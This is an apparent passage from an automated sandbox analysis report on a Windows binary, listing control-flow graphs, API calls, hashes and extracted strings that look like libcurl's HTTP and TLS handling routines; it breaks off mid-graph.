                            control_flow_graph 351 7ff7f1d920d0-7ff7f1d92105 352 7ff7f1d92313-7ff7f1d9231d call 7ff7f1d9a780 351->352 353 7ff7f1d9210b-7ff7f1d9210e 351->353 358 7ff7f1d92322 352->358 353->352 354 7ff7f1d92114-7ff7f1d9211e 353->354 356 7ff7f1d92120-7ff7f1d92124 354->356 357 7ff7f1d92154-7ff7f1d9215d 354->357 356->357 359 7ff7f1d92126-7ff7f1d9213b call 7ff7f1da50b0 356->359 361 7ff7f1d92163-7ff7f1d92165 357->361 362 7ff7f1d922b4-7ff7f1d922ca fopen 357->362 360 7ff7f1d92324-7ff7f1d92340 358->360 373 7ff7f1d92151 359->373 374 7ff7f1d9213d 359->374 364 7ff7f1d92171-7ff7f1d9218a call 7ff7f1da3938 361->364 365 7ff7f1d92167-7ff7f1d9216b 361->365 366 7ff7f1d922f4-7ff7f1d92311 free 362->366 367 7ff7f1d922cc-7ff7f1d922ef _errno strerror call 7ff7f1d9a780 362->367 375 7ff7f1d9219a-7ff7f1d921a1 364->375 376 7ff7f1d9218c-7ff7f1d92198 _errno 364->376 365->362 365->364 366->360 377 7ff7f1d921fd-7ff7f1d92206 free 367->377 373->357 378 7ff7f1d92144-7ff7f1d9214c call 7ff7f1d9a80c 374->378 379 7ff7f1d921a7-7ff7f1d921ab 375->379 380 7ff7f1d9228d-7ff7f1d92291 375->380 376->364 376->375 377->358 378->358 382 7ff7f1d921b1-7ff7f1d921b5 379->382 383 7ff7f1d92293-7ff7f1d922a8 _fdopen 379->383 380->367 380->383 385 7ff7f1d921b9-7ff7f1d921c0 382->385 383->366 386 7ff7f1d922aa-7ff7f1d922b2 _close 383->386 385->385 387 7ff7f1d921c2-7ff7f1d921c9 385->387 386->367 388 7ff7f1d921e0-7ff7f1d921ec malloc 387->388 389 7ff7f1d921cb-7ff7f1d921db free 387->389 390 7ff7f1d9220b-7ff7f1d92219 call 7ff7f1deca50 388->390 391 7ff7f1d921ee-7ff7f1d921f8 call 7ff7f1d9a80c 388->391 389->378 395 7ff7f1d9221e-7ff7f1d92227 _errno 390->395 391->377 396 7ff7f1d92234-7ff7f1d92238 395->396 397 7ff7f1d92229-7ff7f1d92232 _errno 395->397 398 7ff7f1d92283-7ff7f1d92289 396->398 399 7ff7f1d9223a-7ff7f1d92255 call 7ff7f1da4fc8 396->399 397->396 397->398 398->380 402 7ff7f1d92258-7ff7f1d92271 call 7ff7f1da3938 399->402 402->398 405 7ff7f1d92273-7ff7f1d9227f _errno 402->405 405->402 406 7ff7f1d92281 405->406 406->395
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$free$__swprintf_l_close_fdopen_scwprintffopenmallocstrerror
                            • String ID: %s/%s$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
                            • API String ID: 1133054535-2634015058
                            • Opcode ID: fd7843c592cadf858fd699cd2ed77d7019034f0bc63c45a1d72f214499512e42
                            • Instruction ID: d621fca5e74660f3d55a3e138c5098ac958d998b92c631fd3d73648a600a3def
                            • Opcode Fuzzy Hash: fd7843c592cadf858fd699cd2ed77d7019034f0bc63c45a1d72f214499512e42
                            • Instruction Fuzzy Hash: 6761C561A0C64285FB28BB21A8441B9A3B0BF41B94FC48638CA3D073D5DFFCE545C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 407 7ff7f1dca370-7ff7f1dca3a9 408 7ff7f1dca3ab-7ff7f1dca3b2 407->408 409 7ff7f1dca3cd-7ff7f1dca3e1 call 7ff7f1dc8e9c 407->409 410 7ff7f1dca887-7ff7f1dca89a 408->410 411 7ff7f1dca3b8-7ff7f1dca3bf 408->411 409->410 415 7ff7f1dca3e7-7ff7f1dca3fe call 7ff7f1dc12c4 409->415 411->409 413 7ff7f1dca3c1-7ff7f1dca3c8 411->413 413->410 418 7ff7f1dca400-7ff7f1dca414 415->418 419 7ff7f1dca41b-7ff7f1dca43b call 7ff7f1dc8e14 415->419 418->419 423 7ff7f1dca43d-7ff7f1dca456 call 7ff7f1da50b0 419->423 424 7ff7f1dca45e 419->424 429 7ff7f1dca45c 423->429 430 7ff7f1dca55e-7ff7f1dca563 423->430 426 7ff7f1dca465-7ff7f1dca49b call 7ff7f1dc7b1c 424->426 433 7ff7f1dca4a5-7ff7f1dca4ca 426->433 434 7ff7f1dca49d-7ff7f1dca4a0 426->434 429->426 430->410 436 7ff7f1dca501-7ff7f1dca519 call 7ff7f1dc12c4 433->436 437 7ff7f1dca4cc-7ff7f1dca4e4 call 7ff7f1dc12c4 433->437 434->410 443 7ff7f1dca51b-7ff7f1dca522 436->443 444 7ff7f1dca568-7ff7f1dca57c 436->444 437->436 442 7ff7f1dca4e6-7ff7f1dca4ff call 7ff7f1da50b0 437->442 442->430 442->436 443->444 446 7ff7f1dca524-7ff7f1dca55c call 7ff7f1da50b0 443->446 449 7ff7f1dca583-7ff7f1dca597 call 7ff7f1dc9384 444->449 446->430 446->449 449->410 455 7ff7f1dca59d-7ff7f1dca5d2 call 7ff7f1dc12c4 call 7ff7f1dca0c4 449->455 455->410 460 7ff7f1dca5d8-7ff7f1dca5e5 call 7ff7f1dc9fac 455->460 460->410 463 7ff7f1dca5eb-7ff7f1dca5f2 460->463 464 7ff7f1dca5f4-7ff7f1dca5fd 463->464 465 7ff7f1dca60a 463->465 464->465 466 7ff7f1dca5ff-7ff7f1dca608 464->466 467 7ff7f1dca60d-7ff7f1dca640 465->467 466->465 466->467 468 7ff7f1dca642-7ff7f1dca649 467->468 469 7ff7f1dca64c-7ff7f1dca66b call 7ff7f1db1c50 467->469 468->469 472 7ff7f1dca671-7ff7f1dca684 call 7ff7f1dc90fc 469->472 473 7ff7f1dca87c-7ff7f1dca880 call 7ff7f1db1b38 469->473 472->473 478 7ff7f1dca68a-7ff7f1dca691 472->478 476 7ff7f1dca885 473->476 476->410 479 7ff7f1dca693-7ff7f1dca69a 478->479 480 7ff7f1dca6e4-7ff7f1dca6eb 478->480 479->480 482 7ff7f1dca69c-7ff7f1dca6b4 call 7ff7f1dc12c4 479->482 481 7ff7f1dca6ef-7ff7f1dca6f6 480->481 483 7ff7f1dca704 481->483 484 7ff7f1dca6f8-7ff7f1dca702 481->484 482->480 488 7ff7f1dca6b6-7ff7f1dca6ce call 7ff7f1dc7154 482->488 487 7ff7f1dca707-7ff7f1dca711 483->487 484->483 484->487 489 7ff7f1dca713-7ff7f1dca716 487->489 490 7ff7f1dca724 487->490 488->480 498 7ff7f1dca6d0-7ff7f1dca6e2 488->498 489->490 492 7ff7f1dca718-7ff7f1dca722 489->492 493 7ff7f1dca727-7ff7f1dca742 490->493 492->490 492->493 495 7ff7f1dca744-7ff7f1dca747 493->495 496 7ff7f1dca755 493->496 495->496 499 7ff7f1dca749-7ff7f1dca753 495->499 497 7ff7f1dca758-7ff7f1dca75f 496->497 500 7ff7f1dca761-7ff7f1dca76b 497->500 501 7ff7f1dca76d 497->501 498->481 499->496 499->497 500->501 502 7ff7f1dca770-7ff7f1dca854 call 7ff7f1db1c50 500->502 501->502 502->473 508 7ff7f1dca856-7ff7f1dca864 502->508 509 7ff7f1dca866-7ff7f1dca86d 508->509 510 7ff7f1dca89b-7ff7f1dca8ae call 7ff7f1dc9d88 508->510 509->510 512 7ff7f1dca86f-7ff7f1dca876 509->512 510->473 515 7ff7f1dca8b0-7ff7f1dca8c0 call 7ff7f1dc8c7c 510->515 512->510 513 7ff7f1dca878 512->513 513->473 515->473 518 7ff7f1dca8c2-7ff7f1dca8d4 call 7ff7f1dc892c 515->518 518->473 521 7ff7f1dca8d6-7ff7f1dca8dd 518->521 522 7ff7f1dca8e5-7ff7f1dca8ec 521->522 523 7ff7f1dca8df-7ff7f1dca8e3 521->523 524 7ff7f1dca8f3-7ff7f1dca900 call 7ff7f1dc9618 522->524 523->522 523->524 526 7ff7f1dca905-7ff7f1dca909 524->526 526->473 527 7ff7f1dca90f-7ff7f1dca917 526->527 528 7ff7f1dca933-7ff7f1dca93d 527->528 529 7ff7f1dca919-7ff7f1dca920 527->529 531 7ff7f1dca9b4-7ff7f1dca9bb 528->531 532 7ff7f1dca93f-7ff7f1dca95c call 7ff7f1dc6ef8 528->532 529->528 530 7ff7f1dca922-7ff7f1dca92a 529->530 530->528 534 7ff7f1dca92c 530->534 531->476 533 7ff7f1dca9c1-7ff7f1dca9c8 531->533 532->531 538 7ff7f1dca95e-7ff7f1dca996 call 7ff7f1db1f00 532->538 533->476 536 7ff7f1dca9ce-7ff7f1dca9d5 533->536 534->528 536->476 541 7ff7f1dca9a5-7ff7f1dca9a8 538->541 542 7ff7f1dca998-7ff7f1dca99f 541->542 543 7ff7f1dca9aa 541->543 544 7ff7f1dca9a1 542->544 545 7ff7f1dca9ac-7ff7f1dca9af call 7ff7f1dc34fc 542->545 543->531 544->541 545->531
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: $ HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Proxy-Connection$Proxy-Connection: Keep-Alive$Referer$Referer: %s$User-Agent$upload completely sent off: %I64d out of %I64d bytes
                            • API String ID: 1992661772-2069575521
                            • Opcode ID: a02bf5786e98015dd1bbd5b72c3f788f676cc4b8921b4a34461da64a540e6929
                            • Instruction ID: de71404c351a02f16ff4375fae2505c66bf82a1d75abf021eadc8a9838e9bab7
                            • Opcode Fuzzy Hash: a02bf5786e98015dd1bbd5b72c3f788f676cc4b8921b4a34461da64a540e6929
                            • Instruction Fuzzy Hash: 26027F71A08B8281EB59AF25E8502E9A3B4BF44B88F844535DE2D473D5EFBCE451C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 547 7ff7f1ddd3f8-7ff7f1ddd453 548 7ff7f1ddd455-7ff7f1ddd467 547->548 549 7ff7f1ddd472 547->549 548->549 550 7ff7f1ddd469-7ff7f1ddd470 548->550 551 7ff7f1ddd479-7ff7f1ddd498 call 7ff7f1da3968 549->551 550->551 554 7ff7f1ddd49a-7ff7f1ddd4a4 call 7ff7f1db1f00 551->554 555 7ff7f1ddd4a9-7ff7f1ddd4b0 551->555 554->555 557 7ff7f1ddd4ef 555->557 558 7ff7f1ddd4b2-7ff7f1ddd4d2 GetModuleHandleA GetProcAddress 555->558 560 7ff7f1ddd4f1-7ff7f1ddd503 557->560 558->557 559 7ff7f1ddd4d4-7ff7f1ddd4e9 call 7ff7f1da3968 558->559 559->557 567 7ff7f1ddd4eb-7ff7f1ddd4ed 559->567 562 7ff7f1ddd505-7ff7f1ddd517 560->562 563 7ff7f1ddd522 560->563 562->563 565 7ff7f1ddd519-7ff7f1ddd520 562->565 566 7ff7f1ddd529-7ff7f1ddd52c 563->566 565->566 568 7ff7f1ddd55c-7ff7f1ddd573 call 7ff7f1da3968 566->568 569 7ff7f1ddd52e-7ff7f1ddd531 566->569 567->560 577 7ff7f1ddd9e9-7ff7f1ddd9f8 call 7ff7f1db1fa0 568->577 578 7ff7f1ddd579 568->578 570 7ff7f1ddd533-7ff7f1ddd545 569->570 571 7ff7f1ddd550 569->571 570->571 573 7ff7f1ddd547-7ff7f1ddd54e 570->573 574 7ff7f1ddd557-7ff7f1ddd55a 571->574 573->574 574->568 576 7ff7f1ddd57b-7ff7f1ddd58c 574->576 579 7ff7f1ddd5af 576->579 580 7ff7f1ddd58e-7ff7f1ddd5a5 576->580 587 7ff7f1ddd9fd-7ff7f1ddda26 call 7ff7f1deaf80 577->587 578->576 583 7ff7f1ddd5b5-7ff7f1ddd5b7 579->583 580->579 582 7ff7f1ddd5a7-7ff7f1ddd5ad 580->582 582->583 585 7ff7f1ddd64f-7ff7f1ddd658 call 7ff7f1ddcb60 583->585 586 7ff7f1ddd5bd-7ff7f1ddd5c7 583->586 593 7ff7f1ddd65d-7ff7f1ddd65f 585->593 589 7ff7f1ddd5e2-7ff7f1ddd5e5 586->589 590 7ff7f1ddd5c9-7ff7f1ddd5cd 586->590 594 7ff7f1ddd606 589->594 595 7ff7f1ddd5e7-7ff7f1ddd5ff 589->595 590->589 596 7ff7f1ddd5cf-7ff7f1ddd5dc call 7ff7f1dadfa8 590->596 593->587 598 7ff7f1ddd665-7ff7f1ddd66c 593->598 600 7ff7f1ddd609-7ff7f1ddd61a call 7ff7f1dbcf68 594->600 595->594 599 7ff7f1ddd601-7ff7f1ddd604 595->599 596->589 602 7ff7f1ddd691 598->602 603 7ff7f1ddd66e-7ff7f1ddd686 598->603 599->600 609 7ff7f1ddd626-7ff7f1ddd630 600->609 610 7ff7f1ddd61c-7ff7f1ddd623 600->610 606 7ff7f1ddd698 602->606 603->602 605 7ff7f1ddd688-7ff7f1ddd68f 603->605 605->606 608 7ff7f1ddd69c-7ff7f1ddd6a3 606->608 608->608 611 7ff7f1ddd6a5-7ff7f1ddd6a8 608->611 612 7ff7f1ddd645-7ff7f1ddd649 609->612 613 7ff7f1ddd632-7ff7f1ddd636 609->613 610->609 614 7ff7f1ddd6b4-7ff7f1ddd6ba 611->614 615 7ff7f1ddd6aa-7ff7f1ddd6af 611->615 612->585 617 7ff7f1ddd70a-7ff7f1ddd720 inet_pton 612->617 613->612 616 7ff7f1ddd638-7ff7f1ddd640 call 7ff7f1dadfe8 613->616 621 7ff7f1ddd9d3-7ff7f1ddd9dd call 7ff7f1db1fa0 614->621 622 7ff7f1ddd6c0-7ff7f1ddd6e4 call 7ff7f1da56dc 614->622 615->614 620 7ff7f1ddd6b1 615->620 616->612 618 7ff7f1ddd722-7ff7f1ddd737 inet_pton 617->618 619 7ff7f1ddd73b 617->619 624 7ff7f1ddd74d-7ff7f1ddd751 618->624 625 7ff7f1ddd739 618->625 626 7ff7f1ddd73e-7ff7f1ddd748 call 7ff7f1db1f00 619->626 620->614 632 7ff7f1ddd9e2-7ff7f1ddd9e7 621->632 622->621 636 7ff7f1ddd6ea-7ff7f1ddd6fe _strdup 622->636 630 7ff7f1ddd753-7ff7f1ddd7a7 call 7ff7f1db1f00 624->630 631 7ff7f1ddd7a9-7ff7f1ddd7af 624->631 625->626 626->624 635 7ff7f1ddd7b4-7ff7f1ddd7f2 630->635 631->635 632->587 639 7ff7f1ddd7f4-7ff7f1ddd809 635->639 640 7ff7f1ddd813 635->640 636->617 637 7ff7f1ddd700-7ff7f1ddd705 636->637 637->587 639->640 642 7ff7f1ddd80b-7ff7f1ddd811 639->642 641 7ff7f1ddd819-7ff7f1ddd84a calloc 640->641 644 7ff7f1ddd860-7ff7f1ddd8c9 641->644 645 7ff7f1ddd84c-7ff7f1ddd85b call 7ff7f1db1fa0 641->645 642->641 649 7ff7f1ddd955-7ff7f1ddd975 call 7ff7f1db22b4 644->649 650 7ff7f1ddd8cf-7ff7f1ddd8ef 644->650 645->644 652 7ff7f1ddd97a-7ff7f1ddd99e 649->652 654 7ff7f1ddd8f1-7ff7f1ddd8f8 650->654 655 7ff7f1ddd939-7ff7f1ddd950 call 7ff7f1daeb80 call 7ff7f1db1fa0 650->655 660 7ff7f1ddd9a0-7ff7f1ddd9a3 652->660 661 7ff7f1ddd9c2-7ff7f1ddd9d1 call 7ff7f1db1fa0 652->661 658 7ff7f1ddd918-7ff7f1ddd934 call 7ff7f1daeb80 call 7ff7f1db1fa0 654->658 659 7ff7f1ddd8fa-7ff7f1ddd913 call 7ff7f1daeb80 call 7ff7f1db1fa0 654->659 655->649 658->587 659->632 660->661 666 7ff7f1ddd9a5-7ff7f1ddd9c0 660->666 661->632 666->587
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: inet_pton$AddressErrorHandleLastModuleProc_errno_strdup
                            • String ID: ALPN: offers %s$Failed to set SNI$http/1.1$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                            • API String ID: 2172631261-2757354814
                            • Opcode ID: 0e9e4d07fba2867f5551be09efb5a75bc3989f10d8d794d355a4086cf7f47aa1
                            • Instruction ID: aa553abbe8368a2908ebb66ce41e3ffcec790945ef69374217a91d150e887319
                            • Opcode Fuzzy Hash: 0e9e4d07fba2867f5551be09efb5a75bc3989f10d8d794d355a4086cf7f47aa1
                            • Instruction Fuzzy Hash: 22029D32A08A8686EB24EB25D4403ADB7B1FB45798F904235CA7E077D4CFBCE555C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 676 7ff7f1dc9618-7ff7f1dc9655 677 7ff7f1dc965b-7ff7f1dc965f 676->677 678 7ff7f1dc99ae-7ff7f1dc99b9 676->678 681 7ff7f1dc9665-7ff7f1dc9669 677->681 682 7ff7f1dc97cc-7ff7f1dc97d3 677->682 679 7ff7f1dc99c4-7ff7f1dc99d2 678->679 680 7ff7f1dc99bb-7ff7f1dc99c2 678->680 683 7ff7f1dc99d4-7ff7f1dc99db 679->683 684 7ff7f1dc9a17-7ff7f1dc9a32 call 7ff7f1dc12c4 679->684 680->683 681->682 685 7ff7f1dc966f-7ff7f1dc9673 681->685 686 7ff7f1dc9825-7ff7f1dc9838 682->686 687 7ff7f1dc97d5-7ff7f1dc97ec call 7ff7f1db1b64 682->687 683->684 690 7ff7f1dc99dd-7ff7f1dc99e4 683->690 706 7ff7f1dc9a34-7ff7f1dc9a49 call 7ff7f1db1b64 684->706 707 7ff7f1dc9a4f-7ff7f1dc9a67 call 7ff7f1dc12c4 684->707 691 7ff7f1dc9675-7ff7f1dc968a call 7ff7f1db1b64 685->691 692 7ff7f1dc96cc-7ff7f1dc96d7 685->692 688 7ff7f1dc987c-7ff7f1dc9883 686->688 689 7ff7f1dc983a-7ff7f1dc9841 686->689 715 7ff7f1dc9d62-7ff7f1dc9d86 call 7ff7f1deaf80 687->715 716 7ff7f1dc97f2-7ff7f1dc9813 call 7ff7f1dc81d4 687->716 700 7ff7f1dc98a3-7ff7f1dc98a6 688->700 689->688 695 7ff7f1dc9843-7ff7f1dc984a 689->695 698 7ff7f1dc99e6-7ff7f1dc99fb call 7ff7f1dc12c4 690->698 699 7ff7f1dc99fd-7ff7f1dc9a11 call 7ff7f1db1c50 690->699 691->715 729 7ff7f1dc9690-7ff7f1dc96a5 call 7ff7f1dc81d4 691->729 696 7ff7f1dc96e2-7ff7f1dc96f0 692->696 697 7ff7f1dc96d9-7ff7f1dc96e0 692->697 708 7ff7f1dc9861-7ff7f1dc9876 call 7ff7f1db1c50 695->708 709 7ff7f1dc984c-7ff7f1dc985f call 7ff7f1dc12c4 695->709 710 7ff7f1dc96f2-7ff7f1dc96f9 696->710 711 7ff7f1dc9735-7ff7f1dc9739 696->711 697->710 698->684 698->699 699->684 699->715 704 7ff7f1dc9885-7ff7f1dc9899 call 7ff7f1db1c50 700->704 705 7ff7f1dc98a8-7ff7f1dc98be call 7ff7f1dc12c4 700->705 704->715 748 7ff7f1dc989f 704->748 751 7ff7f1dc98c0-7ff7f1dc98eb call 7ff7f1dc844c 705->751 752 7ff7f1dc98ed-7ff7f1dc98f5 705->752 706->707 706->715 753 7ff7f1dc9a92-7ff7f1dc9a9a 707->753 754 7ff7f1dc9a69-7ff7f1dc9a90 call 7ff7f1dc844c 707->754 708->688 708->715 709->688 709->708 710->711 718 7ff7f1dc96fb-7ff7f1dc9702 710->718 723 7ff7f1dc9751-7ff7f1dc9768 call 7ff7f1db1b64 711->723 724 7ff7f1dc973b-7ff7f1dc974b call 7ff7f1dc8848 711->724 744 7ff7f1dc96bf-7ff7f1dc96c7 716->744 745 7ff7f1dc9819-7ff7f1dc9820 716->745 732 7ff7f1dc9704-7ff7f1dc9719 call 7ff7f1dc12c4 718->732 733 7ff7f1dc971b-7ff7f1dc972f call 7ff7f1db1c50 718->733 723->715 761 7ff7f1dc976e-7ff7f1dc97b5 call 7ff7f1dc81d4 723->761 724->715 724->723 755 7ff7f1dc96aa-7ff7f1dc96b1 729->755 732->711 732->733 733->711 733->715 758 7ff7f1dc9d53-7ff7f1dc9d5b call 7ff7f1dc3300 744->758 757 7ff7f1dc9d38-7ff7f1dc9d3d call 7ff7f1db1fa0 745->757 748->700 772 7ff7f1dc9916-7ff7f1dc9930 call 7ff7f1db1b64 751->772 763 7ff7f1dc9900-7ff7f1dc9910 call 7ff7f1dc8848 752->763 764 7ff7f1dc98f7-7ff7f1dc98fe 752->764 766 7ff7f1dc9aa5-7ff7f1dc9ab5 call 7ff7f1dc8848 753->766 767 7ff7f1dc9a9c-7ff7f1dc9aa3 753->767 775 7ff7f1dc9abb-7ff7f1dc9ac5 754->775 755->744 756 7ff7f1dc96b3-7ff7f1dc96ba 755->756 756->757 779 7ff7f1dc9d60 757->779 758->779 788 7ff7f1dc97c3-7ff7f1dc97c7 761->788 789 7ff7f1dc97b7-7ff7f1dc97be 761->789 763->715 763->772 764->772 766->715 766->775 767->775 772->715 795 7ff7f1dc9936-7ff7f1dc999c call 7ff7f1dc81d4 772->795 783 7ff7f1dc9acb-7ff7f1dc9ad3 775->783 784 7ff7f1dc9c88-7ff7f1dc9c9f call 7ff7f1db1b64 775->784 779->715 785 7ff7f1dc9ad9-7ff7f1dc9ae0 783->785 786 7ff7f1dc9c1a-7ff7f1dc9c6c 783->786 784->715 799 7ff7f1dc9ca5-7ff7f1dc9cac 784->799 785->786 791 7ff7f1dc9ae6-7ff7f1dc9aee 785->791 796 7ff7f1dc9c73-7ff7f1dc9c7d call 7ff7f1db1b64 786->796 794 7ff7f1dc9d43-7ff7f1dc9d50 788->794 793 7ff7f1dc9d35 789->793 791->786 798 7ff7f1dc9af4-7ff7f1dc9b0e call 7ff7f1db1b64 791->798 793->757 794->758 795->788 806 7ff7f1dc99a2-7ff7f1dc99a9 795->806 807 7ff7f1dc9c83 796->807 808 7ff7f1dc9d0e-7ff7f1dc9d2c call 7ff7f1dc81d4 796->808 798->715 812 7ff7f1dc9b14-7ff7f1dc9b1b 798->812 804 7ff7f1dc9cc4-7ff7f1dc9ccb 799->804 805 7ff7f1dc9cae-7ff7f1dc9cb5 799->805 804->808 811 7ff7f1dc9ccd-7ff7f1dc9d05 804->811 805->804 810 7ff7f1dc9cb7-7ff7f1dc9cc2 805->810 806->793 807->715 821 7ff7f1dc9d3f 808->821 822 7ff7f1dc9d2e 808->822 810->796 811->808 813 7ff7f1dc9d07-7ff7f1dc9d0b 811->813 815 7ff7f1dc9b1d-7ff7f1dc9b34 call 7ff7f1db1b64 812->815 816 7ff7f1dc9b39-7ff7f1dc9b3d 812->816 813->808 826 7ff7f1dc9be4-7ff7f1dc9be6 815->826 819 7ff7f1dc9b43-7ff7f1dc9b62 call 7ff7f1da4fc8 816->819 820 7ff7f1dc9bcb-7ff7f1dc9be0 call 7ff7f1db1b64 816->820 829 7ff7f1dc9b65-7ff7f1dc9b6c 819->829 820->826 821->794 822->793 826->715 830 7ff7f1dc9bec-7ff7f1dc9c15 826->830 829->829 831 7ff7f1dc9b6e-7ff7f1dc9b7d call 7ff7f1db1b64 829->831 830->808 831->715 834 7ff7f1dc9b83-7ff7f1dc9b8c 831->834 835 7ff7f1dc9b8f-7ff7f1dc9b96 834->835 835->835 836 7ff7f1dc9b98-7ff7f1dc9bac call 7ff7f1db1b64 835->836 839 7ff7f1dc9bc0-7ff7f1dc9bc5 836->839 840 7ff7f1dc9bae-7ff7f1dc9bbb call 7ff7f1db1b64 836->840 839->715 839->820 840->839
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s$%x$0$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request
                            • API String ID: 0-502057143
                            • Opcode ID: ba2daf0a40e8505729aeb6119f5725586f9dddc5ab41dae467808b02c8962ab7
                            • Instruction ID: 92ed3a27c27107f7f0d72a5ca5601475ea28cb8018ea0d112dfd90f80400575d
                            • Opcode Fuzzy Hash: ba2daf0a40e8505729aeb6119f5725586f9dddc5ab41dae467808b02c8962ab7
                            • Instruction Fuzzy Hash: 5A12C161A0868295FB28EB2695102FAA7B4BB04B8CF844935CE3D476D5DFBCE551C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1149 7ff7f1db3ba4-7ff7f1db3bfe call 7ff7f1db4260 1152 7ff7f1db3c04-7ff7f1db3c22 call 7ff7f1db315c 1149->1152 1153 7ff7f1db3ef9-7ff7f1db3f1b call 7ff7f1deaf80 1149->1153 1158 7ff7f1db3c24-7ff7f1db3c55 _errno * 2 call 7ff7f1dae9c8 call 7ff7f1db1fa0 1152->1158 1159 7ff7f1db3c5a-7ff7f1db3c7c call 7ff7f1db1f00 1152->1159 1172 7ff7f1db3d83-7ff7f1db3d93 call 7ff7f1db4190 1158->1172 1164 7ff7f1db3c85-7ff7f1db3c89 1159->1164 1165 7ff7f1db3c7e-7ff7f1db3c83 1159->1165 1167 7ff7f1db3ce5 1164->1167 1168 7ff7f1db3c8b-7ff7f1db3c95 1164->1168 1165->1164 1165->1167 1171 7ff7f1db3ce8-7ff7f1db3cf3 call 7ff7f1db3af0 1167->1171 1170 7ff7f1db3c97-7ff7f1db3cbb setsockopt 1168->1170 1168->1171 1170->1171 1174 7ff7f1db3cbd-7ff7f1db3ce3 WSAGetLastError call 7ff7f1dae9c8 call 7ff7f1db1f00 1170->1174 1180 7ff7f1db3cf5-7ff7f1db3cfc 1171->1180 1181 7ff7f1db3d09-7ff7f1db3d10 1171->1181 1172->1153 1174->1171 1180->1181 1182 7ff7f1db3cfe-7ff7f1db3d04 call 7ff7f1db28e0 1180->1182 1183 7ff7f1db3d16-7ff7f1db3d20 1181->1183 1184 7ff7f1db3d98 1181->1184 1182->1181 1188 7ff7f1db3d22-7ff7f1db3d2c 1183->1188 1189 7ff7f1db3d2e 1183->1189 1187 7ff7f1db3d9b-7ff7f1db3da4 1184->1187 1191 7ff7f1db3da6-7ff7f1db3daa 1187->1191 1192 7ff7f1db3dac-7ff7f1db3dbb call 7ff7f1db2b14 1187->1192 1188->1189 1193 7ff7f1db3d35-7ff7f1db3d5b 1188->1193 1189->1193 1191->1192 1194 7ff7f1db3ddd-7ff7f1db3e16 ioctlsocket call 7ff7f1dcbdf4 1191->1194 1192->1194 1199 7ff7f1db3dbd-7ff7f1db3dd3 call 